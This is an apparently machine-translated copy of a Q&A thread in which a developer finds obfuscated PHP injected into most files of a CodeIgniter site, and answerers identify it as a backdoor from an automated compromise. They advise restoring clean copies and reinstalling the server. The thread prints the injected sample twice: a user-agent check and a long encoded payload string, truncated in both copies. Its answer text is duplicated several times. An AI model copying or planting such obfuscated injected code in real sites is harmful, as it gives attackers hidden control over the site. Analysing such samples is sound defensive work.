Fatal编程技术网
  • php/
  • 源代码中奇怪和不寻常的字符-PHP

源代码中奇怪和不寻常的字符-PHP

php

源代码中奇怪和不寻常的字符-PHP,php,Php,几个月前,我在Codeigniter中创建了一个站点,并将其上载到live server。在所有者指示我对该站点上的文件执行一些更新之前,该站点工作正常。我在本地计算机中备份并设置了该站点,我注意到很多文件源代码中都包含了很多奇怪的字符 <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41

几个月前,我在Codeigniter中创建了一个站点,并将其上载到live server。在所有者指示我对该站点上的文件执行一些更新之前,该站点工作正常。我在本地计算机中备份并设置了该站点,我注意到很多文件源代码中都包含了很多奇怪的字符

      <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-

下面是代码的可读版本:


下面是代码的可读版本:



我相信这个网站被黑客入侵了,这是一个模糊不清的后门。询问网站所有者关于变化的情况。如果他们对此一无所知,那么他们的帐户可能已被泄露。在这种情况下,您只需告诉他们更改密码,然后将该文件的本地工作副本上载到服务器,并对该文件进行新的更改。@Rolen Koh,有没有办法删除这些不需要的字符?,90%的文件被不想要的字符“感染”。我相信这个网站被黑客攻击了,这是一个隐藏的后门。询问网站所有者有关更改的信息。如果他们对此一无所知,那么他们的帐户可能已被泄露。在这种情况下,您只需告诉他们更改密码,然后将该文件的本地工作副本上载到服务器上,并对该文件进行新的更改。@Rolen Koh,有没有办法删除这些不需要的字符?90%的文件被这些不需要的字符“感染”有没有办法清理此站点,运行付费防病毒程序就足够了吗?很抱歉,我没有太多关于这方面的信息,但正如我在回答中所说的,我会研究用一个未感染的副本替换整个网站,并发现漏洞。如果服务器安全性差(如由特权用户运行www服务器),操作系统也有可能遭到破坏。我不会冒任何风险,会从头开始安装整个系统(将被黑客攻击的系统留到一边进行分析)。@DanielleRoseMabunga可能会更有用。@DanielleRoseMabunga问
有没有办法清理这个网站,运行付费防病毒程序就足够了?
通常,没有。这些似乎是自动攻击,它使用机器人探测互联网,并尝试一些常见故障将自身注入服务器,然后进行复制,并打开后门,以便机器人“所有者”可以使用它。。。。由于攻击者可能已经控制了它,如果它的程序被修改,他有可能准备好“重新安装”。有没有办法清理这个网站,运行付费的反病毒程序就足够了?很抱歉,我没有太多信息,但正如我在回答中所说,我会用一个未受感染的副本替换整个网站,并发现漏洞。如果服务器安全性差(如由特权用户运行www服务器),操作系统也有可能受到破坏。我不会冒任何风险,会从头开始安装整个系统(将被黑客攻击的系统留到一边进行分析)。@DanielleRoseMabunga可能会更有用。@DanielleRoseMabunga问
有没有办法清理这个网站,运行付费防病毒程序就足够了?
通常,没有。这些似乎是自动攻击,它使用机器人探测互联网,并尝试一些常见故障将自身注入服务器,然后进行复制,并打开后门,以便机器人“所有者”可以使用它。。。。由于攻击者很可能已经控制了它,如果它的程序被修改,他就有可能准备好“重新安装”。

    <?php
      defined('BASEPATH') OR exit('No direct script access allowed');



<?php 
    if(!isset($GLOBALS["anuna"])) { 
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); 
        if ((! strstr($ua,"msie")) and (! strstr($ua,"rv:11"))) 
            $GLOBALS["anuna"] = 1; 
    }
?>
<?php 
    $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-